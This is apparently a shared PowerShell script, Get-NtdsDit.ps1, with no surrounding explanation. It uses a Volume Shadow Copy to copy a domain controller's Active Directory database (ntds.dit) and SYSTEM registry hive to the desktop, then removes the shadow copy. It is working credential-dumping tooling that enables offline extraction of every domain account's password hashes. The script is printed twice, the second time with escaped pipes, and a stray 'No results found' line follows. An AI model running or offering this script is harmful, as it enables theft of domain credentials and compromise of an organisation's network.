justaguywhocodes/Get-NtdsDit.ps1

## Get-NtdsDit.ps1
#Requires -RunAsAdministrator

# Define paths
$ntdsPath = "$env:SystemRoot\NTDS\ntds.dit"
$systemHivePath = "$env:SystemRoot\System32\config\SYSTEM"
$desktopPath = [Environment]::GetFolderPath("Desktop")
$outputNTDS = Join-Path $desktopPath "ntds.dit"
$outputSystem = Join-Path $desktopPath "SYSTEM"

# Create Volume Shadow Copy
try {
    $shadowVolume = (Get-WmiObject Win32_Volume -Filter "DriveLetter='$($env:SystemDrive)'").DeviceID
    $shadow = (Get-WmiObject -List Win32_ShadowCopy).Create($shadowVolume, "ClientAccessible")
    $shadowID = $shadow.ShadowID
    $shadowInfo = Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $shadowID }
    $shadowPath = $shadowInfo.DeviceObject + "\"

    # Create temporary mount point
    $tempDir = Join-Path $env:TEMP ([System.Guid]::NewGuid().ToString())
    New-Item -ItemType Directory -Path $tempDir -Force | Out-Null

    try {
        # Mount shadow copy
        cmd /c mklink /d "$tempDir\ShadowMount" "$shadowPath" 2>&1 | Out-Null

        # Copy files from shadow copy
        $shadowNTDS = Join-Path $tempDir "ShadowMount\Windows\NTDS\ntds.dit"
        $shadowSystem = Join-Path $tempDir "ShadowMount\Windows\System32\config\SYSTEM"

        Copy-Item -Path $shadowNTDS -Destination $outputNTDS -Force
        Copy-Item -Path $shadowSystem -Destination $outputSystem -Force

        Write-Host "Files copied successfully to your desktop:"
        Write-Host "NTDS: $outputNTDS"
        Write-Host "SYSTEM: $outputSYSTEM"
    }
    finally {
        # Cleanup mount point
        if (Test-Path "$tempDir\ShadowMount") {
            cmd /c rmdir "$tempDir\ShadowMount" 2>&1 | Out-Null
        }
        Remove-Item -Path $tempDir -Recurse -Force -ErrorAction SilentlyContinue
    }
}
catch {
    Write-Error "Operation failed: $_"
    exit 1
}

# Remove shadow copy
Get-WmiObject Win32_ShadowCopy | Where-Object { $_.ID -eq $shadowID } | ForEach-Object { $_.Delete() }
	#Requires -RunAsAdministrator

	# Define paths
	$ntdsPath = "$env:SystemRoot\NTDS\ntds.dit"
	$systemHivePath = "$env:SystemRoot\System32\config\SYSTEM"
	$desktopPath = [Environment]::GetFolderPath("Desktop")
	$outputNTDS = Join-Path $desktopPath "ntds.dit"
	$outputSystem = Join-Path $desktopPath "SYSTEM"

	# Create Volume Shadow Copy
	try {
	$shadowVolume = (Get-WmiObject Win32_Volume -Filter "DriveLetter='$($env:SystemDrive)'").DeviceID
	$shadow = (Get-WmiObject -List Win32_ShadowCopy).Create($shadowVolume, "ClientAccessible")
	$shadowID = $shadow.ShadowID
	$shadowInfo = Get-WmiObject Win32_ShadowCopy \| Where-Object { $_.ID -eq $shadowID }
	$shadowPath = $shadowInfo.DeviceObject + "\"

	# Create temporary mount point
	$tempDir = Join-Path $env:TEMP ([System.Guid]::NewGuid().ToString())
	New-Item -ItemType Directory -Path $tempDir -Force \| Out-Null

	try {
	# Mount shadow copy
	cmd /c mklink /d "$tempDir\ShadowMount" "$shadowPath" 2>&1 \| Out-Null

	# Copy files from shadow copy
	$shadowNTDS = Join-Path $tempDir "ShadowMount\Windows\NTDS\ntds.dit"
	$shadowSystem = Join-Path $tempDir "ShadowMount\Windows\System32\config\SYSTEM"

	Copy-Item -Path $shadowNTDS -Destination $outputNTDS -Force
	Copy-Item -Path $shadowSystem -Destination $outputSystem -Force

	Write-Host "Files copied successfully to your desktop:"
	Write-Host "NTDS: $outputNTDS"
	Write-Host "SYSTEM: $outputSYSTEM"
	}
	finally {
	# Cleanup mount point
	if (Test-Path "$tempDir\ShadowMount") {
	cmd /c rmdir "$tempDir\ShadowMount" 2>&1 \| Out-Null
	}
	Remove-Item -Path $tempDir -Recurse -Force -ErrorAction SilentlyContinue
	}
	}
	catch {
	Write-Error "Operation failed: $_"
	exit 1
	}

	# Remove shadow copy
	Get-WmiObject Win32_ShadowCopy \| Where-Object { $_.ID -eq $shadowID } \| ForEach-Object { $_.Delete() }
No results found